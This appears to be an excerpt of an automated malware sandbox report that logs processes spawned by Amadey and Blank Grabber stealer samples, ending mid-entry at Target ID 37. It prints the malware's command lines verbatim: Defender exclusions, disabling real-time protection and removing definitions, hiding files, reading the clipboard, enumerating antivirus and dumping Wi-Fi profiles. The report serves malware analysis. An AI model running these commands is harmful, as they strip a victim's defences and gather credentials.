                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:16:10:39
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff67aed0000
                                                                                                                                                                                                                                        File size:6'291'456 bytes
                                                                                                                                                                                                                                        MD5 hash:63EFECD388A74A9CDEB79CD7C8020E7E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:16:10:40
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff67aed0000
                                                                                                                                                                                                                                        File size:6'291'456 bytes
                                                                                                                                                                                                                                        MD5 hash:63EFECD388A74A9CDEB79CD7C8020E7E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""
                                                                                                                                                                                                                                        Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7a3bb0000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff6d7870000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff6d7870000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 67%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                        Imagebase:0x7ff681f80000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:16:10:48
